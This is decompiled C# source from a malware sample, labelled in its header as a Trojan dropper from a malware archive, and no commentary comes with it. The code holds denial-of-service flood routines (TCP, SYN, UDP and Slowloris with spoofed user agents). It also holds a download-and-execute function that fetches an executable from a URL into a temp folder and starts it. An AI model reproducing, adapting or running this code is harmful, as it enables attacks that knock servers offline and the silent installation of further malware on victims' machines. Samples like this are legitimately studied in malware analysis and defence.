// Decompiled with JetBrains decompiler // Type: Poly.Function // Assembly: Poly, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 618F3010-979B-4F78-8F99-D5C35E30AA2E // Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Sysn.bshb-a13f90b28df8b73652beb4c3c95ff1b8dc0c2fc41dee8f7d6acdd43828a0aadc.exe using System; using System.Diagnostics; using System.IO; using System.Net; using System.Net.Sockets; using System.Security.Cryptography; using System.Text; using System.Threading; namespace Poly { public static class Function { private static bool active; private static string host; private static int port; private static int sockets; private static int timeout; private static int packets; private static Function.Type currentType; public static Thread bThread; private static string[] userAgents = new string[28] { "(compatible; MSIE 6.0; Windows NT)", "(Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9b5) Gecko/2008032619 Firefox/3.0b5", "(Windows; U; Windows NT 5.1; en-US; rv:1.8.0.5) Gecko/20060731 Firefox/1.5.0.5 Flock/0.7.4.1", "(MobilePhone SCP-5500/US/1.0) NetFront/3.0 MMP/2.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)", "[en] (WinNT; U)", "(compatible; MSIE 7.0; Windows NT 5.1; bgft)", "(compatible; MSIE 6.0; Win32)", "(X11; U; Linux 2.4.2-2 i586; en-US; m18) Gecko/20010131 Netscape6/6.01", "(X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801", "(SunOS 5.8 sun4u; U) Opera 5.0 [en]", "(compatible; Googlebot/2.1; http://www.google.com/bot.html)", "(X11; U; Linux i686; en-US; rv:1.8) Gecko/20051111 Firefox/1.5 BAVM/1.0.0", "(X11; U; Linux i686; en-US; rv:1.9.1a2pre) Gecko/2008073000 Shredder/3.0a2pre ThunderBrowse/3.2.1.8", "(Windows; U; Windows NT 6.1; it; rv:1.9.2) Gecko/20100115 Firefox/3.6", "Galeon/1.2.0 (X11; Linux i686; U;) Gecko/20020326", "(Windows NT 5.1; U; en) Presto/2.5.22 Version/10.50", "(Windows NT 5.2; U; en) Presto/2.2.15 Version/10.10", "(X11; Linux x86_64; U; Linux Mint; en) Presto/2.2.15 Version/10.10", "(Macintosh; PPC Mac OS X; U; en) Opera 8.0", "(Windows; U; Windows NT 5.1; en-US; rv:0.9.6) Gecko/20011128", "(Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10", "(iPhone; U; CPU like Mac OS X; en) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/4A93 Safari/419.3", "(compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET CLR 4.0.20402; MS-RTC LM 8)", "(compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET CLR 4.0.20402; MS-RTC LM 8)", "(Windows; U; MSIE 7.0; Windows NT 6.0; en-US)", "(compatible; MSIE 6.1; Windows XP; .NET CLR 1.1.4322; .NET CLR 2.0.50727)", "(compatible; MSIE 8.0; Windows NT 6.2; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)", "(Windows; U; Windows NT 6.1; nl; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3" }; private static string[] browsers = new string[10] { "Opera/9.0", "Opera/8.90", "Opera/9.80", "Opera/9.33", "Mozilla/5.0", "Mozilla/4.08", "Mozilla/4.0", "Mozilla/3.6", "Mozilla/3.1", "Mozilla/3.0" }; public static bool Active => Function.active; public static Function.Type CurrentType => Function.currentType; public static string MD5Hash(string input) { byte[] hash = MD5.Create().ComputeHash(Encoding.ASCII.GetBytes(input)); StringBuilder stringBuilder = new StringBuilder(); for (int index = 0; index < hash.Length; ++index) stringBuilder.Append(hash[index].ToString("X2")); return stringBuilder.ToString(); } public static string CurrentTypeAsString { get { switch (Function.currentType) { case Function.Type.TCP: return "TCP"; case Function.Type.SYN: return "SYN"; case Function.Type.UDP: return "UDP"; case Function.Type.Slowloris: return "Slowloris"; default: return (string) null; } } } public static void InitFlood( Function.Type type, string Host, int Port, int Sockets, int Packets, int Timeout) { Function.currentType = type; Function.host = Host; Function.port = Port; Function.sockets = Sockets; Function.packets = Packets; Function.timeout = Timeout; Function.active = false; } public static void Begin() { Function.active = true; Function.bThread = new Thread(new ThreadStart(Function.backStart)); Function.bThread.Start(); } public static void Abort() { Function.active = false; Function.bThread.Abort(); } private static void backStart() { for (int index = 0; index < Function.sockets; ++index) { try { new Thread(new ThreadStart(Function.stress)) { IsBackground = true }.Start(); } catch (OutOfMemoryException ex) { Function.sockets = index - 1; break; } } } private static void stress() { int num = 0; while (Function.active) { switch (Function.currentType) { case Function.Type.TCP: Socket socket1 = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); socket1.Blocking = false; while (num < Function.packets) { if (Function.active) { try { socket1.Connect(Function.host, Function.port); socket1.Send(Function.tcpRandom()); socket1.Close(); socket1 = (Socket) null; } catch { socket1.Close(); break; } ++num; Thread.Sleep(1); } else break; } Thread.Sleep(Function.timeout); break; case Function.Type.SYN: Socket socket2 = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); socket2.Blocking = false; try { socket2.BeginConnect(Function.host, Function.port, new AsyncCallback(Function.onConnect), (object) null); } catch { } Thread.Sleep(100); try { if (socket2.Connected) socket2.Disconnect(false); socket2.Close(); } catch { } Thread.Sleep(Function.timeout); break; case Function.Type.UDP: Socket socket3 = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp); socket3.Blocking = false; Socket socket4; try { socket3.Connect(Function.host, Function.port); while (num < Function.packets && Function.active) { socket3.Send(Function.udpRandom()); ++num; Thread.Sleep(1); } socket3.Close(); socket4 = (Socket) null; } catch { socket3.Close(); socket4 = (Socket) null; break; } Thread.Sleep(Function.timeout); break; case Function.Type.Slowloris: Socket socket5 = (Socket) null; try { socket5 = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); socket5.Connect(Function.host, Function.port); socket5.Send(Function.GenerateRequest()); while (socket5.Connected) { if (Function.active) { socket5.Send(Function.GenerateRequest()); Thread.Sleep(2000); } else break; } } catch { socket5.Close(); } Thread.Sleep(Function.timeout); break; } num = 0; } if (!Function.active) return; Function.Abort(); } private static void onConnect(IAsyncResult ar) { } private static byte[] udpRandom() { Random random = new Random(); byte[] buffer = new byte[random.Next(1470, 65507)]; random.NextBytes(buffer); return buffer; } private static byte[] tcpRandom() { Random random = new Random(); byte[] buffer = new byte[random.Next(1470, (int) ushort.MaxValue)]; random.NextBytes(buffer); return buffer; } private static byte[] GenerateRequest() { Random random = new Random(); StringBuilder stringBuilder = new StringBuilder(); stringBuilder.AppendLine("GET / HTTP/1.1"); stringBuilder.AppendLine("Host: " + Function.host); stringBuilder.AppendLine("User-Agent: " + Function.browsers[random.Next(0, Function.browsers.Length - 1)] + " " + Function.userAgents[random.Next(0, Function.userAgents.Length - 1)]); stringBuilder.AppendLine("Content-Length: " + random.Next(1, 1000).ToString()); stringBuilder.AppendLine("X-a: " + random.Next(1, 10000).ToString()); stringBuilder.Append("Connection: keep-alive"); return Encoding.ASCII.GetBytes(stringBuilder.ToString()); } public static bool DlExecute(string URL) { try { Process.Start(Function.download(URL)); return true; } catch { return false; } } public static bool DlExecute(string URL, string MD5) { try { string str = Function.download(URL); if (Function.verifyMD5(str, MD5)) Process.Start(str); return true; } catch { return false; } } private static string download(string URL) { string str = string.Empty; Uri result; bool flag = Uri.TryCreate(URL, UriKind.Absolute, out result); if (!flag) str = "http://" + URL; Console.WriteLine("Url is : {0}", (object) result); if (flag) { try { string absoluteUri = result.AbsoluteUri; string fileName = Path.GetTempFileName() + ".exe"; WebClient webClient = new WebClient(); webClient.DownloadFile(absoluteUri, fileName); webClient.Dispose(); return fileName; } catch { return string.Empty; } } else { try { string address = str; string fileName = Path.GetTempFileName() + ".exe"; WebClient webClient = new WebClient(); webClient.DownloadFile(address, fileName); webClient.Dispose(); return fileName; } catch { return string.Empty; } } } private static string getMD5(string path) { byte[] hash; using (Stream inputStream = (Stream) new BufferedStream((Stream) new FileStream(path, FileMode.Open), 1200000)) hash = new MD5CryptoServiceProvider().ComputeHash(inputStream); StringBuilder stringBuilder = new StringBuilder(); for (int index = 0; index < hash.Length; ++index) stringBuilder.Append(hash[index].ToString("x2")); return stringBuilder.ToString(); } private static bool verifyMD5(string ExecutablePath, string MD5) { string md5 = Function.getMD5(ExecutablePath); return MD5.Length == 32 && StringComparer.OrdinalIgnoreCase.Compare(md5, MD5) == 0; } public static string Update(string url) { string str = Function.download(url); return str == string.Empty ? string.Empty : str; } public static string Update(string url, string md5) { string ExecutablePath = Function.download(url); return ExecutablePath == string.Empty || !Function.verifyMD5(ExecutablePath, md5) ? string.Empty : ExecutablePath; } public enum Type { TCP, SYN, UDP, Slowloris, } } }